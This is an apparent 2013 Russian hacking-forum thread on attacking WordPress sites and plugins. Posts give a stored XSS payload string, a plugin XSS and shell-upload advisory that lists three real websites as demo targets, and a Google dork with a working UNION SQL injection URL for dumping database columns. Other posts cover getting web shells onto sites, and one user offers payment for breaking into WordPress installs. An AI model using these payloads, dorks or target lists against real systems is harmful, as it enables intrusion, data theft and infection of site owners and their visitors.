 |
|

03.01.2013, 18:41
|
|
Новичок
Регистрация: 19.09.2011
Сообщений: 11
С нами:
7709366
Репутация:
0
|
|
Сообщение от MaxFast
Wordpress 3.5 Active XSS
Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
Проверить можно тут.
(c) MaxFast aka n3m1s
C правами админа и iframe можно вставить.
|
|
|

12.01.2013, 22:15
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами:
8772921
Репутация:
1
|
|
Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.
+# This affects W3 Total Cache
|
|
|

21.02.2013, 22:21
|
|
Новичок
Регистрация: 01.12.2011
Сообщений: 0
С нами:
7604246
Репутация:
0
|
|
Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability
Код HTML:
# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/
#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------
------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r HTML codes in (Text) then click Copy To Clipboard...
screenshot #=> http://i49.tinypic.com/1zgqngx.png
------------------
#=> Shell Upload
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r simple file uploader & upload u'r shell
screenshot #=> http://i45.tinypic.com/1426mhg.jpg
------------------
#=> Demos
------------------
http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.
Вопрос: какие идеи?
© Источник
|
|
|

27.03.2013, 21:23
|
|
Новичок
Регистрация: 25.10.2011
Сообщений: 0
С нами:
7657526
Репутация:
0
|
|
wordpress
Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...
icq: 640831391
|
|
|

25.04.2013, 02:12
|
|
Новичок
Регистрация: 24.04.2013
Сообщений: 1
С нами:
6869846
Репутация:
0
|
|
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
|
|
|

09.05.2013, 18:53
|
|
Познающий
Регистрация: 26.03.2011
Сообщений: 81
С нами:
7964246
Репутация:
2
|
|
Сообщение от Mastahh
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8
там будет папка wp-content/plugins Так вот в ней и лежал плагины
|
|
|

31.05.2013, 14:27
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Версия 3.5 и 3.5.1
Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:
Код:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))
после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
|
|
|

02.06.2013, 00:44
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?
EDIT
Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
|
|
|

27.06.2013, 14:12
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
WordPress marker_listings.xml SQL injection
Google dork:
Код:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:
Код:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
|
|
|

27.08.2013, 22:42
|
|
Новичок
Регистрация: 12.08.2013
Сообщений: 16
С нами:
6711446
Репутация:
0
|
|
Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF
Сам плагин, версии 2.31
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|